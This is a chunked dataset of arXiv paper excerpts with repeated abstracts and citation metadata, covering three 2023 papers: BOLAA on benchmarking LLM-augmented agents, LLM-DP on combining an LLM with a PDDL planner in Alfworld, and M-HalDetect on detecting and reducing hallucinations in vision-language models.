Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.05960 | 1 | # ABSTRACT
The massive successes of large language models (LLMs) encourage the emerging exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to generate actions with its core LLM and interact with environments, which facilitates the ability to resolve complex tasks by conditioning on past interactions such as observations and actions. Since the investigation of LAA is still very recent, limited explorations are available. Therefore, we provide a comprehensive comparison of LAA in terms of both agent architectures and LLM backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs such that each labor LAA focuses on one type of action, i.e. BOLAA, where a controller manages the communication among multiple agents. We conduct simulations on both decision-making and multi-step reasoning environments, which comprehensively justify the capacity of LAAs. Our performance results provide quantitative suggestions for designing LAA architectures and the optimal choice of LLMs, as well as the compatibility of both. We release our implementation code of LAAs to the public at https://github.com/salesforce/BOLAA.
# INTRODUCTION | 2308.05960#1 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 1 | # 1 Introduction
Consistency (Wang et al., 2023b) augment the context with reasoning traces. Other, agent-based approaches, such as ReAct (Yao et al., 2023), integrate feedback from the environment iteratively, giving the agent the ability to take "thinking" steps or to augment its context with a reasoning trace. However, these approaches frequently involve high computational costs due to the iterated invocations of LLMs and still face challenges dealing with the limits of the context window and recovering from hallucinations, which can compromise the quality of the plans.
Conversely, traditional symbolic planners, such as the Fast-Forward planner (Hoffmann and Nebel, 2001) or the BFS(f) planner (Lipovetzky et al., 2014), excel at finding optimal plans efficiently. But symbolic planners require problem and domain descriptions as prerequisites (McDermott, 2000), which hampers their applicability in real-world scenarios where it may be infeasible to achieve these high informational demands. For instance, knowing a complete and accurate description of the goal may not be possible before exploring the environment through actions. | 2308.06391#1 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 1 | Instruction tuned Large Vision Language Models (LVLMs) have significantly advanced in generalizing across a diverse set of multi-modal tasks, especially for Visual Question Answering (VQA). However, generating detailed responses that are visually grounded is still a challenging task for these models. We find that even the current state-of-the-art LVLMs (InstructBLIP) still contain a staggering 30 percent of the hallucinatory text in the form of non-existent objects, unfaithful descriptions, and inaccurate relationships. To address this, we introduce M-HalDetect1, a Multimodal Hallucination Detection Dataset that can be used to train and benchmark models for hallucination detection and prevention. M-HalDetect consists of 16k fine-grained annotations on VQA examples, making it the first comprehensive multi-modal hallucination detection dataset for detailed image descriptions. Unlike previous work that only consider object hallucination, we additionally annotate both entity descriptions and relationships that are unfaithful. To demonstrate the potential of this dataset for hallucination prevention, we optimize InstructBLIP through our novel Fine-grained Direct Preference Optimization | 2308.06394#1 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
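The M-HalDetect record above describes fine-grained (sentence- and sub-sentence-level) annotations over VQA responses. A minimal sketch of one plausible span-level representation follows; the label vocabulary and layout here are assumptions for illustration, not the released dataset's actual schema.

```python
from dataclasses import dataclass
from typing import List

# Illustrative label set only: the abstract distinguishes accurate text from
# non-existent objects, unfaithful descriptions, and inaccurate relationships.
LABELS = {"ACCURATE", "INACCURATE_OBJECT", "UNFAITHFUL_DESCRIPTION", "INACCURATE_RELATIONSHIP"}

@dataclass
class SpanAnnotation:
    start: int  # character offsets into the model's response
    end: int
    label: str

    def __post_init__(self):
        assert self.label in LABELS and 0 <= self.start < self.end

def hallucination_fraction(spans: List[SpanAnnotation]) -> float:
    """Fraction of annotated characters carrying a non-ACCURATE label."""
    bad = sum(s.end - s.start for s in spans if s.label != "ACCURATE")
    total = sum(s.end - s.start for s in spans)
    return bad / total if total else 0.0

# "A red car is parked next to a dog." -- suppose no dog is in the image.
spans = [SpanAnnotation(0, 21, "ACCURATE"), SpanAnnotation(22, 34, "INACCURATE_OBJECT")]
print(round(hallucination_fraction(spans), 2))  # 0.36
```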
2308.05960 | 2 | # INTRODUCTION
Recent booming successes of large language models (LLMs) (OpenAI, 2023; Touvron et al., 2023) motivate emerging exploration of employing LLM to tackle various complex tasks (Zhang et al., 2023), amongst which LLM-augmented Autonomous Agents (LAAs) (Shinn et al., 2023; Madaan et al., 2023b; Huang et al., 2022; Kim et al., 2023; Paul et al., 2023; Yao et al., 2023a) stand with most spotlights. LAA extends the intelligence of LLM to sequential action executions, exhibiting superiority in interacting with environments and resolving complex tasks via collecting observations. To name a few, BabyAGI1 proposes an AI-powered task management system, which leverages OpenAI LLM2 to create, prioritize, and execute tasks. AutoGPT3 is another popular open-source LAA framework that enables the API calling capability of LLMs. ReAct (Yao et al., 2023a) is a recently proposed LAA method to interact with environments then consecutively generate the next action. Langchain4 is a recently released open-source framework for developing LAA. | 2308.05960#2 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
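The introduction above describes ReAct-style agents that interleave intermediate reasoning with action generation, conditioning each step on the accumulated history of thoughts, actions, and observations. A minimal sketch of that loop, with `toy_llm` and `toy_env` as hypothetical stand-ins rather than any real API:

```python
from typing import Callable, Optional, Tuple

def react_loop(llm: Callable[[str], str],
               env: Callable[[str], Tuple[str, bool]],
               task: str, max_steps: int = 10) -> Optional[str]:
    """ReAct-style loop: think, act, observe, appending everything to the running context."""
    history = f"Task: {task}\n"
    for _ in range(max_steps):
        thought = llm(history + "Thought:")                     # intermediate reasoning step
        action = llm(history + f"Thought: {thought}\nAction:")  # next action, conditioned on the thought
        observation, done = env(action)                         # execute in the environment
        history += f"Thought: {thought}\nAction: {action}\nObservation: {observation}\n"
        if done:
            return observation
    return None  # step budget exhausted

# Toy stand-ins so the sketch runs end-to-end:
def toy_llm(prompt: str) -> str:
    return "search[one-day trip]" if prompt.endswith("Action:") else "I should search."

def toy_env(action: str) -> Tuple[str, bool]:
    return f"executed {action}", True

print(react_loop(toy_llm, toy_env, "plan a one-day trip"))  # executed search[one-day trip]
```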
2308.06391 | 2 | Large Language Models (LLMs), like GPT-4 (OpenAI, 2023), have proven remarkably effective at various natural language processing tasks, particularly in zero-shot or few-shot settings (Brown et al., 2020). However, employing LLMs in embodied agents, which interact with dynamic environments, presents substantial challenges. LLMs tend to generate incorrect or spurious information, a phenomenon known as hallucination, and their performance is brittle to the phrasing of prompts (Ji et al., 2022). Moreover, LLMs are ill-equipped for naive long-term planning since managing an extensive context over multiple steps is complex and resource-consuming (Silver et al., 2022; Liu et al., 2023). | 2308.06391#2 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
2308.06394 | 2 | To demonstrate the potential of this dataset for hallucination prevention, we optimize InstructBLIP through our novel Fine-grained Direct Preference Optimization (FDPO). We also train fine-grained multi-modal reward models from InstructBLIP and evaluate their effectiveness with best-of-n rejection sampling. We perform human evaluation on both FDPO and rejection sampling, and find that they reduce hallucination rates in InstructBLIP by 41% and 55% respectively. We also find that our reward model generalizes to other multi-modal models, reducing hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has strong correlation with human evaluated accuracy scores. | 2308.06394#2 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
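The record above evaluates reward models with best-of-n rejection sampling: draw n candidate responses and keep the one the reward model scores highest. A minimal sketch under stated assumptions; `toy_generate` and `toy_reward` are hypothetical stand-ins, not the InstructBLIP or reward-model APIs:

```python
import random
from typing import Callable

def best_of_n(generate: Callable[[], str], reward: Callable[[str], float], n: int) -> str:
    """Best-of-n rejection sampling: draw n candidates, keep the highest-reward one."""
    candidates = [generate() for _ in range(n)]
    return max(candidates, key=reward)

# Toy stand-ins: a sampler over canned captions and a reward that penalises
# a hallucinated object ("dog") that is not in the image.
def toy_generate() -> str:
    return random.choice(["A red car on a street.", "A red car next to a dog."])

def toy_reward(text: str) -> float:
    return 0.0 if "dog" in text else 1.0

random.seed(0)
print(best_of_n(toy_generate, toy_reward, n=8))  # almost surely the dog-free caption
```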
2308.05960 | 3 | Due to the initial investigation, LAA is rather under-explored. Firstly, the optimal agent architecture is undetermined. ReAct (Yao et al., 2023a) prompts the agents with pre-defined examples such that the LLM learns to generate the next action via in-context learning. Moreover, ReAct argues that an agent should have intermediate reasoning steps before action executions. ReWOO (Xu et al., 2023) introduces additional planning steps for LAA. Langchain generalizes the ReAct agent with
⋆[email protected]
1 https://github.com/yoheinakajima/babyagi
2 https://platform.openai.com/docs/api-reference
3 https://github.com/Significant-Gravitas/Auto-GPT
4 https://github.com/langchain-ai/langchain
zero-shot tool usage ability. Intrinsically, the optimal architecture of agents should be aligned with both tasks and the associated LLM backbone, which is less explored in the existing works. | 2308.05960#3 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 3 | Various approaches have aimed to mitigate some of these limitations. For instance, methods like Chain-of-Thought (Wei et al., 2022) and Self-Consistency augment the context with reasoning traces. Previous work by Liu et al. (2023) has shown that LLMs can generate valid problem files in the Planning Domain Definition Language (PDDL) for many simple examples. Yet, the problem of incomplete information remains: agents often need to interact with the world to discover their surroundings before optimal planning can be applied. Some versions of PDDL have been proposed in the past to deal with probabilities or Task and Motion Planning, such as PPDDL and PDDLStream (Younes and Littman, 2004; Garrett et al., 2018), but these still assume a human designer encoding the agent's understanding of the domain and the planning problem, rather than the agent learning from interactions. Therefore, where modern LLMs need minimal information to figure out a task, e.g. through Few-shot or In-Context Learning (Honovich et al., | 2308.06391#3 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
Introduction
Large language models (LLMs) have transformed the AI landscape in recent years, scaling their training data to trillions of tokens and their parameter count to hundreds of billions (Brown et al. 2020; OpenAI 2023; Touvron et al. 2023). This has unlocked powerful emergent behaviors, and seen widespread adoption through the use of chat agents such as ChatGPT. Recently, advances in multi-modal models have seen adoption around grafting visual backbones onto pre-trained large language models, resulting in LVLMs (Liu et al. 2023b; Dai et al. 2023; Ye et al. 2023). While this has led to
These authors contributed equally. †Work done at ScaleAI 1Code and dataset will be publicly released
strides in overall VQA performance, it brings along the same challenges that plague these LLMs - a significant one being the propensity to generate hallucinations. | 2308.06394#3 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
a staggering 30 percent of the hallucinatory text in the form of non-existent
objects, unfaithful descriptions, and inaccurate relationships. To address
this, we introduce M-HalDetect, a (M)ultimodal (Hal)lucination (Detect)ion
Dataset that can be used to train and benchmark models for hallucination
detection and prevention. M-HalDetect consists of 16k fine-grained annotations
on VQA examples, making it the first comprehensive multi-modal hallucination
detection dataset for detailed image descriptions. Unlike previous work that
only consider object hallucination, we additionally annotate both entity
descriptions and relationships that are unfaithful. To demonstrate the
potential of this dataset for hallucination prevention, we optimize
InstructBLIP through our novel Fine-grained Direct Preference Optimization
(FDPO). We also train fine-grained multi-modal reward models from InstructBLIP
and evaluate their effectiveness with best-of-n rejection sampling. We perform
human evaluation on both FDPO and rejection sampling, and find that they reduce
hallucination rates in InstructBLIP by 41% and 55% respectively. We also find
that our reward model generalizes to other multi-modal models, reducing
hallucinations in LLaVA and mPLUG-OWL by 15% and 57% respectively, and has
strong correlation with human evaluated accuracy scores. | http://arxiv.org/pdf/2308.06394 | Anisha Gunjal, Jihan Yin, Erhan Bas | cs.CV, cs.LG | preprint | null | cs.CV | 20230811 | 20230818 | [
{
"id": "2302.04023"
},
{
"id": "2305.17926"
},
{
"id": "2307.04964"
},
{
"id": "2305.20050"
},
{
"id": "2306.14895"
},
{
"id": "1803.01937"
},
{
"id": "2305.18290"
},
{
"id": "2204.05862"
},
{
"id": "2306.14565"
},
{
"id": "2305.06500"
},
{
"id": "2306.01693"
},
{
"id": "2304.08485"
},
{
"id": "2305.10355"
}
] |
2308.05960 | 4 | zero-shot tool usage ability. Intrinsically, the optimal architecture of agents should be aligned with both tasks and the associated LLM backbone, which is less explored in the existing works.
Secondly, understanding the efficacy of the existing LLMs in LAA is far from comprehensive. The existing preliminary works only compare the performances of a few LLM backbones. ReAct adopts the PaLM (Chowdhery et al., 2022) as the backbone LLM. ReWOO employs OpenAI text-davinci-003 model for instruction-tuning Alpaca model (Taori et al., 2023) for agent planning. MIND2Web (Deng et al., 2023) compares Flan-T5 and OpenAI GPT3.5/4 for generalist web agent. Nevertheless, few current works comprehensively compare the performance of LAA with regard to various pre-trained LLMs. A very recent work (Liu et al., 2023) releases a benchmark for evaluating LLMs as Agents. Nevertheless, they fail to jointly consider the agent architectures along with their LLM backbones. Selecting the optimal LLMs from both efficacy and efficiency perspectives advances the current exploration of LAA. | 2308.05960#4 | BOLAA: Benchmarking and Orchestrating LLM-augmented Autonomous Agents | The massive successes of large language models (LLMs) encourage the emerging
exploration of LLM-augmented Autonomous Agents (LAAs). An LAA is able to
generate actions with its core LLM and interact with environments, which
facilitates the ability to resolve complex tasks by conditioning on past
interactions such as observations and actions. Since the investigation of LAA
is still very recent, limited explorations are available. Therefore, we provide
a comprehensive comparison of LAA in terms of both agent architectures and LLM
backbones. Additionally, we propose a new strategy to orchestrate multiple LAAs
such that each labor LAA focuses on one type of action, \textit{i.e.} BOLAA,
where a controller manages the communication among multiple agents. We conduct
simulations on both decision-making and multi-step reasoning environments,
which comprehensively justify the capacity of LAAs. Our performance results
provide quantitative suggestions for designing LAA architectures and the
optimal choice of LLMs, as well as the compatibility of both. We release our
implementation code of LAAs to the public at
\url{https://github.com/salesforce/BOLAA}. | http://arxiv.org/pdf/2308.05960 | Zhiwei Liu, Weiran Yao, Jianguo Zhang, Le Xue, Shelby Heinecke, Rithesh Murthy, Yihao Feng, Zeyuan Chen, Juan Carlos Niebles, Devansh Arpit, Ran Xu, Phil Mui, Huan Wang, Caiming Xiong, Silvio Savarese | cs.AI | Preprint | null | cs.AI | 20230811 | 20230811 | [
{
"id": "2204.02311"
},
{
"id": "2112.09332"
},
{
"id": "2307.13854"
},
{
"id": "2304.01904"
},
{
"id": "2303.17491"
},
{
"id": "2201.11903"
},
{
"id": "1802.08802"
},
{
"id": "2305.14992"
},
{
"id": "2306.06070"
},
{
"id": "2308.00675"
},
{
"id": "2302.07867"
},
{
"id": "2305.18323"
},
{
"id": "2307.12856"
},
{
"id": "2303.17580"
},
{
"id": "2305.15334"
},
{
"id": "2307.16789"
},
{
"id": "2304.03442"
},
{
"id": "2303.11366"
},
{
"id": "2303.17651"
}
] |
2308.06391 | 4 | [Figure 1 schematic: the instruction "Heat a potato and put it on a countertop" and a PDDL domain (actions go-to, pick-up, heat, ...) are passed to the LLM, which generates PDDL problem(s) with a goal, e.g. (:goal (exists (?t - potato ?x - countertop) (and (inReceptacle ?t ?x)))), and sampled init facts, e.g. (inReceptacle potato-1 fridge-1); a planner returns plans (or "No Plan found"), and an Action Selector uses observations to choose what to do next.]
Figure 1: LLM Dynamic Planner (LLM-DP). The LLM grounds observations and processes natural language instructions into PDDL to use with a symbolic planner. This model can solve plans for unobserved or previously unknown objects because the LLM generates plausible predicates for relevant objects through semantic and pragmatic inference. Through sampling possible predicates, multiple plans can be found, and an Action Selector decides whether to act, review its understanding of the problem, or ask clarification questions.
2022; Chen et al., 2022; Min et al., 2022), traditional planners need maximal information. | 2308.06391#4 | Dynamic Planning with a LLM | While Large Language Models (LLMs) can solve many NLP tasks in zero-shot
settings, applications involving embodied agents remain problematic. In
particular, complex plans that require multi-step reasoning become difficult
and too costly as the context window grows. Planning requires understanding the
likely effects of one's actions and identifying whether the current environment
satisfies the goal state. While symbolic planners find optimal solutions
quickly, they require a complete and accurate representation of the planning
problem, severely limiting their use in practical scenarios. In contrast,
modern LLMs cope with noisy observations and high levels of uncertainty when
reasoning about a task. Our work presents LLM Dynamic Planner (LLM-DP): a
neuro-symbolic framework where an LLM works hand-in-hand with a traditional
planner to solve an embodied task. Given action-descriptions, LLM-DP solves
Alfworld faster and more efficiently than a naive LLM ReAct baseline. | http://arxiv.org/pdf/2308.06391 | Gautier Dagan, Frank Keller, Alex Lascarides | cs.CL, cs.RO | null | null | cs.CL | 20230811 | 20230811 | [
{
"id": "2303.11366"
},
{
"id": "2303.08774"
},
{
"id": "2305.15334"
}
] |
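The figure record above (cleaned into a placeholder) shows the LLM-DP pipeline: the LLM turns the instruction and its beliefs into PDDL goal/init facts, a symbolic planner searches each hypothesised problem, and an Action Selector picks among the resulting plans. The sketch below mirrors that loop under stated assumptions: `llm_to_pddl` and `plan` are stand-ins (no real LLM or planner is called), and the goal string is reconstructed from the figure residue.

```python
from typing import List, Optional

# Goal recovered from Figure 1: heat a potato and put it on a countertop.
GOAL = "(:goal (exists (?t - potato ?x - countertop) (and (inReceptacle ?t ?x))))"

def llm_to_pddl(instruction: str, beliefs: List[str]) -> List[str]:
    """Stand-in for the LLM: turn sampled beliefs about object locations into :init blocks."""
    return ["(:init " + b + ")" for b in beliefs]

def plan(goal: str, init: str) -> Optional[List[str]]:
    """Stand-in for a symbolic planner such as BFS(f); returns an action sequence or None."""
    if "fridge" in init:
        return ["go-to fridge-1", "pick-up potato-1", "heat potato-1", "put potato-1 countertop-1"]
    return None  # "No Plan found" for this hypothesised init state

def action_selector(plans: List[List[str]]) -> List[str]:
    """Pick among candidate plans; here simply the shortest one."""
    return min(plans, key=len)

beliefs = ["(inReceptacle potato-1 fridge-1)", "(inReceptacle potato-1 cabinet-2)"]
candidates = []
for init in llm_to_pddl("Heat a potato and put it on a countertop", beliefs):
    p = plan(GOAL, init)
    if p is not None:
        candidates.append(p)
print(action_selector(candidates))
```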
2308.06394 | 4 | strides in overall VQA performance, it brings along the same challenges that plague these LLMs - a significant one being the propensity to generate hallucinations.
In language models, hallucinations occur when the model produces inaccurate or misleading factual information that cannot be supported by existing knowledge stores (Ji et al. 2023; Bang et al. 2023). In the context of VQA for LVLMs, hallucinations can manifest as responses containing references or descriptions of the input image that are incorrect (Li et al. 2023). It is essential to address and mitigate these hallucinations to enhance the reliability and accuracy of multi-modal models in real-life use cases. However, these multi-modal hallucinations are hard to programmatically detect and often require human supervision, which can be costly. | 2308.06394#4 | Detecting and Preventing Hallucinations in Large Vision Language Models | Instruction tuned Large Vision Language Models (LVLMs) have significantly
advanced in generalizing across a diverse set of multi-modal tasks, especially
for Visual Question Answering (VQA). However, generating detailed responses
that are visually grounded is still a challenging task for these models. We
find that even the current state-of-the-art LVLMs (InstructBLIP) still contain
